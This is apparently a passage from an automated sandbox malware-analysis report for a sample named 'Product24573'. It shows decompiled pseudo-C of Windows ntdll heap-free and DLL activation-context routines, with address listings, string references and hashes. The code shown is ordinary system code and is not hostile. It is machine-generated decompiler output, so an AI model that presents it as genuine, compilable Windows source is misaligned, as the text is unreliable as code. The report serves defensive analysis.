				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01117D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01117D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E011B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01117D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01117D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E011B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0114D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                          0x0111a229
                                          0x0111a231
                                          0x0111a23f
                                          0x0111a242
                                          0x0111a244
                                          0x0111a24c
                                          0x0111a255
                                          0x0111a25a
                                          0x0111a25f
                                          0x01161c76
                                          0x01161c78
                                          0x01161c7e
                                          0x01161c7f
                                          0x01161c81
                                          0x01161c82
                                          0x01161c84
                                          0x01161c89
                                          0x01161c8b
                                          0x01161c9e
                                          0x01161c9e
                                          0x01161cab
                                          0x01161cb2
                                          0x00000000
                                          0x01161cb2
                                          0x01161c8d
                                          0x01161c92
                                          0x00000000
                                          0x00000000
                                          0x01161c94
                                          0x01161c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01161c98
                                          0x0111a265
                                          0x0111a265
                                          0x0111a266
                                          0x0111a26f
                                          0x0111a270
                                          0x0111a276
                                          0x0111a277
                                          0x0111a279
                                          0x0111a27e
                                          0x0111a282
                                          0x01161db5
                                          0x01161dbb
                                          0x01161dc1
                                          0x01161dc5
                                          0x01161de4
                                          0x01161de9
                                          0x01161dc7
                                          0x01161ddc
                                          0x01161de1
                                          0x01161def
                                          0x01161df3
                                          0x01161df7
                                          0x01161dfe
                                          0x01161e06
                                          0x0111a302
                                          0x0111a308
                                          0x0111a308
                                          0x0111a288
                                          0x0111a28d
                                          0x0111a294
                                          0x01161cc1
                                          0x0111a29a
                                          0x0111a29a
                                          0x0111a29a
                                          0x0111a29f
                                          0x01161ccb
                                          0x01161cd1
                                          0x01161cd8
                                          0x01161cea
                                          0x01161cea
                                          0x01161cd8
                                          0x0111a2a9
                                          0x0111a2af
                                          0x0111a2bc
                                          0x01161cfd
                                          0x0111a2c2
                                          0x0111a2c2
                                          0x0111a2c2
                                          0x0111a2c7
                                          0x01161d07
                                          0x01161d0d
                                          0x01161d14
                                          0x01161d1f
                                          0x01161d21
                                          0x01161d2c
                                          0x01161d2c
                                          0x01161d2c
                                          0x01161d47
                                          0x01161d47
                                          0x01161d14
                                          0x0111a2cd
                                          0x0111a2d2
                                          0x0111a2d9
                                          0x01161d5a
                                          0x0111a2df
                                          0x0111a2df
                                          0x0111a2df
                                          0x0111a2e4
                                          0x01161d69
                                          0x01161d6b
                                          0x01161d76
                                          0x01161d76
                                          0x01161d76
                                          0x01161d91
                                          0x01161d91
                                          0x0111a2ea
                                          0x0111a2f0
                                          0x0111a2f5
                                          0x01161da8
                                          0x01161dad
                                          0x01161dad
                                          0x0111a2fd
                                          0x0111a300
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 1ba57804b1021ac775e76d2bf67ca6b041989bec6849d10875d8e6e0540c69bd
                                          • Instruction ID: 2dc2f3dbec299253aa07329e0557e20ab45bb7c450508edf11927c81655c6b5e
                                          • Opcode Fuzzy Hash: 1ba57804b1021ac775e76d2bf67ca6b041989bec6849d10875d8e6e0540c69bd
                                          • Instruction Fuzzy Hash: FB513B32205681AFD72ADB68D848FABBBE8FFD0754F090468F555CB295D735D800CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01128E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E01128E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x11ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x11e8464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x11e5780 & 0x00000003) != 0) {
							E01175510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x11e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0113B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x11e7984; // 0xca2b48
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x11e8464; // 0x74cc0110
					 *0x11eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01129B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x11e5780 & 0x00000005) != 0) {
						_push(_t49);
						E01175510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                          0x01128e0f
                                          0x01128e16
                                          0x01128e19
                                          0x01128e1b
                                          0x01128e21
                                          0x01128e7f
                                          0x01128e85
                                          0x01169354
                                          0x0116936c
                                          0x01169371
                                          0x0116937b
                                          0x01169381
                                          0x01169381
                                          0x0116937b
                                          0x01128e9d
                                          0x01128e9d
                                          0x01128e29
                                          0x01128e2c
                                          0x01128e38
                                          0x01128e3e
                                          0x01128e43
                                          0x01128eb5
                                          0x01128eb9
                                          0x011692aa
                                          0x011692af
                                          0x011692e8
                                          0x011692e8
                                          0x011692af
                                          0x01128eb9
                                          0x01128e45
                                          0x01128e53
                                          0x01128e5b
                                          0x01128e5f
                                          0x01128e78
                                          0x01128e78
                                          0x01128e7d
                                          0x01128ec3
                                          0x01128ecd
                                          0x01128ed2
                                          0x01128ed2
                                          0x01128ec5
                                          0x01128ec5
                                          0x00000000
                                          0x01128e7d
                                          0x01128e67
                                          0x01128ea4
                                          0x0116931a
                                          0x00000000
                                          0x00000000
                                          0x01169320
                                          0x01128ea4
                                          0x01128e70
                                          0x01169325
                                          0x01169340
                                          0x01169345
                                          0x01169345
                                          0x01128e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01169357
                                          • LdrpFindDllActivationContext, xrefs: 01169331, 0116935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0116933B, 01169367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0116932A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 66293d3b80e286f2e47b5328756e576c7acad89fe477b779650142e9c90b176e
                                          • Instruction ID: 974b0b729be5121c6ea0164227d1d381efe7e0f73cd0fafbb3f543cf283a41ce
                                          • Opcode Fuzzy Hash: 66293d3b80e286f2e47b5328756e576c7acad89fe477b779650142e9c90b176e
                                          • Instruction Fuzzy Hash: B5410832A403359FEB3EAB9CC849A76B6F5FB0065CF0A4179E9545B152E7709DE08382
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: e11c7d6945e56e64f727f77c3c34c702c928ca4d2abb6dd57d98f60cb67131e9
                                          • Instruction ID: bc91f20a6bb4de4868294d668936c3152825be186e7dc1ad0f96d65fe9f7acaa
                                          • Opcode Fuzzy Hash: e11c7d6945e56e64f727f77c3c34c702c928ca4d2abb6dd57d98f60cb67131e9
                                          • Instruction Fuzzy Hash: 3D312531200215EFD728DBADC8C9FE677E8EF04624F198059F587CBA92DB71A840CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011199BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E011199BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E011AFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E011BA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0114D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E010FB150();
										} else {
											E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E010FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x11e6378 = 1;
											asm("int3");
											 *0x11e6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0111A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0111A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0111BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E011BA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0111A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0111A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0114D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E010FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x11e6378 = 1;
									asm("int3");
									 *0x11e6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E011AFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E011BA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0114D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E010FB150();
													} else {
														E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E010FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x11e6378 = 1;
														asm("int3");
														 *0x11e6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0111A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0111A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0111BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E011BA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0114D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E010FB150();
													} else {
														E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E010FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x11e6378 = 1;
														asm("int3");
														 *0x11e6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0111A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0111A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0111BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0111BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                          0x011199ca
                                          0x011199cc
                                          0x011199df
                                          0x011199e3
                                          0x011199f8
                                          0x011199fb
                                          0x011199fb
                                          0x00000000
                                          0x01119a48
                                          0x01119a48
                                          0x01119a4c
                                          0x01119a51
                                          0x01119a55
                                          0x01119a61
                                          0x01119a66
                                          0x01119a68
                                          0x01161457
                                          0x0116145c
                                          0x0116145c
                                          0x01119a68
                                          0x01119a6e
                                          0x01119a71
                                          0x01119a74
                                          0x01119a76
                                          0x01161466
                                          0x01161469
                                          0x01161469
                                          0x0116146c
                                          0x0116146e
                                          0x01161471
                                          0x01161474
                                          0x01161477
                                          0x01161479
                                          0x0116159c
                                          0x0116159c
                                          0x0116159d
                                          0x011615a6
                                          0x011615ab
                                          0x011615ab
                                          0x00000000
                                          0x011615ab
                                          0x0116147f
                                          0x01161481
                                          0x00000000
                                          0x00000000
                                          0x0116148a
                                          0x0116148d
                                          0x01161493
                                          0x01161495
                                          0x011614c0
                                          0x011614c0
                                          0x011614c3
                                          0x011614c6
                                          0x011614c8
                                          0x011614cb
                                          0x011614cf
                                          0x011614f2
                                          0x011614f2
                                          0x011614f5
                                          0x011614f8
                                          0x01161501
                                          0x01161508
                                          0x0116150b
                                          0x0116150e
                                          0x01161510
                                          0x01161513
